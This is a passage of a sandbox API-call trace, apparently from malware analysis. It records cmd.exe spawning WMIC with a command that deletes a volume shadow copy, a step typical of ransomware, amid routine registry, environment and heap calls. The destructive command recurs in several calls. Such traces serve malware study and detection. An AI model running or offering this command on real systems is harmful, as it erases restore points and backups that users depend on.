lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x0, lpData=0x1aec40*=0x1, lpcbData=0x1aec24*=0x1000) returned 0x2 [0100.046] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x4, lpData=0x1aec40*=0x0, lpcbData=0x1aec24*=0x4) returned 0x0 [0100.046] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x4, lpData=0x1aec40*=0x9, lpcbData=0x1aec24*=0x4) returned 0x0 [0100.046] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x4, lpData=0x1aec40*=0x9, lpcbData=0x1aec24*=0x4) returned 0x0 [0100.046] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x0, lpData=0x1aec40*=0x9, lpcbData=0x1aec24*=0x1000) returned 0x2 [0100.046] RegCloseKey (hKey=0x44) returned 0x0 [0100.046] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517448 [0100.046] srand (_Seed=0x5f517448) [0100.046] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete" [0100.047] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete" [0100.047] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a91c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0100.047] GetProcessHeap () returned 0x260000 [0100.047] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x218) returned 0x27ab40 [0100.047] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0100.047] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a90f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0100.047] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a90f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0100.047] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a90f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0100.047] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0100.047] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0100.047] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0100.048] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0100.048] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0100.048] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0100.048] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0100.048] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0100.048] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0100.048] GetProcessHeap () returned 0x260000 [0100.048] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279620 | out: hHeap=0x260000) returned 1 [0100.048] GetEnvironmentStringsW () returned 0x278b90* [0100.048] GetProcessHeap () returned 0x260000 [0100.048] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xa94) returned 0x27ad60 [0100.048] FreeEnvironmentStringsW (penv=0x278b90) returned 1 [0100.048] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a90f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.048] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a90f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0100.048] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0100.048] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0100.048] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0100.048] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0100.048] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0100.049] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0100.049] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0100.049] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0100.049] GetProcessHeap () returned 0x260000 [0100.049] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x5c) returned 0x27b800 [0100.049] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1afa30 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0100.049] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1afa30, lpFilePart=0x1afa10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1afa10*="Desktop") returned 0x25 [0100.049] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0100.049] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af740 | out: lpFindFileData=0x1af740*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x27b870 [0100.049] FindClose (in: hFindFile=0x27b870 | out: hFindFile=0x27b870) returned 1 [0100.049] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1af740 | out: lpFindFileData=0x1af740*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x27b870 [0100.050] FindClose (in: hFindFile=0x27b870 | out: hFindFile=0x27b870) returned 1 [0100.050] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0100.050] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1af740 | out: lpFindFileData=0x1af740*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x27b870 [0100.050] FindClose (in: hFindFile=0x27b870 | out: hFindFile=0x27b870) returned 1 [0100.050] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0100.050] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0100.050] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0100.050] GetProcessHeap () returned 0x260000 [0100.050] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27ad60 | out: hHeap=0x260000) returned 1 [0100.050] GetEnvironmentStringsW () returned 0x27b870* [0100.051] GetProcessHeap () returned 0x260000 [0100.051] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xae8) returned 0x27c360 [0100.051] FreeEnvironmentStringsW (penv=0x27b870) returned 1 [0100.051] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a91c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0100.051] GetProcessHeap () returned 0x260000 [0100.051] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27b800 | out: hHeap=0x260000) returned 1 [0100.051] GetProcessHeap () returned 0x260000 [0100.051] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x4016) returned 0x27ce50 [0100.051] GetProcessHeap () returned 0x260000 [0100.051] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xe4) returned 0x279680 [0100.051] GetProcessHeap () returned 0x260000 [0100.051] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27ce50 | out: hHeap=0x260000) returned 1 [0100.051] GetConsoleOutputCP () returned 0x1b5 [0100.052] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a91bfe0 | out: lpCPInfo=0x4a91bfe0) returned 1 [0100.052] GetUserDefaultLCID () returned 0x409 [0100.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a917b50, cchData=8 | out: lpLCData=":") returned 2 [0100.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afb40, cchData=128 | out: lpLCData="0") returned 2 [0100.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afb40, cchData=128 | out: lpLCData="0") returned 2 [0100.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afb40, cchData=128 | out: lpLCData="1") returned 2 [0100.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a92a740, cchData=8 | out: lpLCData="/") returned 2 [0100.053] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a92a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0100.053] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a92a460, cchData=32 | out: lpLCData="Tue") returned 4 [0100.053] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a92a420, cchData=32 | out: lpLCData="Wed") returned 4 [0100.053] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a92a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0100.053] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a92a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0100.053] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a92a360, cchData=32 | out: lpLCData="Sat") returned 4 [0100.053] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a92a700, cchData=32 | out: lpLCData="Sun") returned 4 [0100.053] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a917b40, cchData=8 | out: lpLCData=".") returned 2 [0100.053] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a92a4e0, cchData=8 | out: lpLCData=",") returned 2 [0100.053] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0100.055] GetProcessHeap () returned 0x260000 [0100.055] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20c) returned 0x2797e0 [0100.055] GetConsoleTitleW (in: lpConsoleTitle=0x2797e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.055] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0100.055] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0100.055] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0100.055] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0100.056] GetProcessHeap () returned 0x260000 [0100.056] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x4012) returned 0x27ce50 [0100.056] GetProcessHeap () returned 0x260000 [0100.056] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27ce50 | out: hHeap=0x260000) returned 1 [0100.059] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0100.059] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0100.059] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0100.059] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0100.059] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0100.059] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0100.059] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0100.059] GetProcessHeap () returned 0x260000 [0100.059] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xb0) returned 0x279a00 [0100.059] GetProcessHeap () returned 0x260000 [0100.059] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x54) returned 0x279ac0 [0100.062] GetProcessHeap () returned 0x260000 [0100.062] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x9e) returned 0x279b20 [0100.063] GetConsoleTitleW (in: lpConsoleTitle=0x1afa50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.063] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.063] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.063] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af5e0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af5c0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af5c0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0100.063] GetProcessHeap () returned 0x260000 [0100.063] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x218) returned 0x279bd0 [0100.063] GetProcessHeap () returned 0x260000 [0100.063] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xe2) returned 0x279df0 [0100.064] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0100.064] GetProcessHeap () returned 0x260000 [0100.064] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x420) returned 0x261320 [0100.064] SetErrorMode (uMode=0x0) returned 0x8001 [0100.064] SetErrorMode (uMode=0x1) returned 0x0 [0100.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x261330, lpFilePart=0x1af2e0 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x1af2e0*="wbem") returned 0x18 [0100.064] SetErrorMode (uMode=0x8001) returned 0x1 [0100.064] GetProcessHeap () returned 0x260000 [0100.064] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x261320, Size=0x54) returned 0x261320 [0100.064] GetProcessHeap () returned 0x260000 [0100.064] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x261320) returned 0x54 [0100.064] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0100.064] GetProcessHeap () returned 0x260000 [0100.064] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x279ee0 [0100.064] GetProcessHeap () returned 0x260000 [0100.065] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x7c) returned 0x279f30 [0100.065] GetProcessHeap () returned 0x260000 [0100.065] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x279f30, Size=0x48) returned 0x279f30 [0100.065] GetProcessHeap () returned 0x260000 [0100.065] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x279f30) returned 0x48 [0100.065] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a90f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0100.065] GetProcessHeap () returned 0x260000 [0100.065] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xe8) returned 0x279f90 [0100.069] GetProcessHeap () returned 0x260000 [0100.069] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x279f90, Size=0x7e) returned 0x279f90 [0100.069] GetProcessHeap () returned 0x260000 [0100.069] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x279f90) returned 0x7e [0100.070] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.070] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x1af050, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af050) returned 0x27a020 [0100.071] GetProcessHeap () returned 0x260000 [0100.071] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x2746c0 [0100.071] FindClose (in: hFindFile=0x27a020 | out: hFindFile=0x27a020) returned 1 [0100.071] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0100.071] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0100.071] GetConsoleTitleW (in: lpConsoleTitle=0x1af5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.071] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af358, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af318 | out: lpAttributeList=0x1af358, lpSize=0x1af318) returned 1 [0100.071] UpdateProcThreadAttribute (in: lpAttributeList=0x1af358, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af308, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af358, lpPreviousValue=0x0) returned 1 [0100.071] GetStartupInfoW (in: lpStartupInfo=0x1af470 | out: lpStartupInfo=0x1af470*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0100.071] GetProcessHeap () returned 0x260000 [0100.071] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x20) returned 0x2746f0 [0100.071] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0100.071] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0100.071] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0100.071] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0100.071] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0100.072] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0100.073] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0100.073] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0100.073] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0100.073] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0100.073] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0100.073] GetProcessHeap () returned 0x260000 [0100.073] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2746f0 | out: hHeap=0x260000) returned 1 [0100.073] GetProcessHeap () returned 0x260000 [0100.073] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x278a30 [0100.073] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0100.074] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1af390*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af340 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete", lpProcessInformation=0x1af340*(hProcess=0x54, hThread=0x50, dwProcessId=0xaf8, dwThreadId=0xa70)) returned 1 [0100.087] CloseHandle (hObject=0x50) returned 1 [0100.087] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0100.087] GetProcessHeap () returned 0x260000 [0100.087] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27c360 | out: hHeap=0x260000) returned 1 [0100.087] GetEnvironmentStringsW () returned 0x27ad60* [0100.087] GetProcessHeap () returned 0x260000 [0100.087] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xae8) returned 0x27b850 [0100.087] FreeEnvironmentStringsW (penv=0x27ad60) returned 1 [0100.087] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0101.533] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1af288 | out: lpExitCode=0x1af288*=0x0) returned 1 [0101.533] CloseHandle (hObject=0x54) returned 1 [0101.534] _vsnwprintf (in: _Buffer=0x1af4f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af298 | out: _Buffer="00000000") returned 8 [0101.534] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0101.534] GetProcessHeap () returned 0x260000 [0101.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27b850 | out: hHeap=0x260000) returned 1 [0101.534] GetEnvironmentStringsW () returned 0x27ad60* [0101.534] GetProcessHeap () returned 0x260000 [0101.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xb0e) returned 0x27b880 [0101.534] FreeEnvironmentStringsW (penv=0x27ad60) returned 1 [0101.534] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0101.534] GetProcessHeap () returned 0x260000 [0101.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27b880 | out: hHeap=0x260000) returned 1 [0101.534] GetEnvironmentStringsW () returned 0x27ad60* [0101.534] GetProcessHeap () returned 0x260000 [0101.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xb0e) returned 0x27b880 [0101.534] FreeEnvironmentStringsW (penv=0x27ad60) returned 1 [0101.534] GetProcessHeap () returned 0x260000 [0101.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x278a30 | out: hHeap=0x260000) returned 1 [0101.534] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af358 | out: lpAttributeList=0x1af358) [0101.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0101.534] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0101.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0101.534] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a90e194 | out: lpMode=0x4a90e194) returned 1 [0101.535] _get_osfhandle (_FileHandle=0) returned 0x3 [0101.535] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a90e198 | out: lpMode=0x4a90e198) returned 1 [0101.535] SetConsoleInputExeNameW () returned 0x1 [0101.535] GetConsoleOutputCP () returned 0x1b5 [0101.535] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a91bfe0 | out: lpCPInfo=0x4a91bfe0) returned 1 [0101.535] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0101.535] exit (_Code=0) Process: id = "25" image_name = "wmic.exe" filename = 